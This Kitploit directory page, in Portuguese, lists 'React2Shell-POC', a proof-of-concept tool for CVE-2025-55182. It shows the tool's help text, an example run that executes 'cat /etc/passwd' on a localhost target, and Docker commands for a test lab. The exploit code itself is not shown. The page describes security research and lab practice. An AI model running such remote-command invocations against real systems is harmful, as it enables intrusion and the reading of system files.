Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
React2Shell-POC — React2Shell (CVE-2025-55182) POC | Kitploit
Ferramentas/GitHubGitHub/snipevx/react2shell-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubsnipevx/react2shell-poc

React2Shell-POC

React2Shell (CVE-2025-55182) POC

Ver Repositório
22há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Esta Prova de Conceito (PoC) para a vulnerabilidade React2Shell (CVE-2025-55182) foi desenvolvida estritamente para fins educacionais e de pesquisa.

Ela tem o objetivo de demonstrar a existência e o potencial impacto de uma vulnerabilidade de segurança específica em um ambiente controlado, autorizado e não produtivo.

Confira meu blog para uma análise detalhada da vulnerabilidade react2shell: https://vxsnipe.xyz/posts/react2shell/

Uso

root@kitploit:~
➜ python poc.py -h

      _____  ______          _____ _______ ___   _____ _    _ ______ _      _
     |  __ \|  ____|   /\   / ____|__   __|__ \ / ____| |  | |  ____| |    | |
     | |__) | |__     /  \ | |       | |     ) | (___ | |__| | |__  | |    | |
     |  _  /|  __|   / /\ \| |       | |    / / \___ \|  __  |  __| | |    | |
     | | \ \| |____ / ____ \ |____   | |   / /_ ____) | |  | | |____| |____| |____
     |_|  \_\______/_/    \_\_____|  |_|  |____|_____/|_|  |_|______|______|______|

usage: poc.py [-h] -u URL -c COMMAND

CVE-2025-55182 POC by 0xSN1PE

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target URL (e.g., http://localhost:3000/)
  -c, --command COMMAND
                        Command to execute (e.g., 'id')

➜ python poc.py -u http://localhost:3000/ -c 'cat /etc/passwd'

Configuração do ambiente de teste com docker

Este PoC vem com um arquivo docker que pode ser usado para simular a vulnerabilidade react2shell em um ambiente controlado e seguro.

root@kitploit:~
docker build -t react2shell .
docker run -p 3000:3000 react2shell
Baixar ferramenta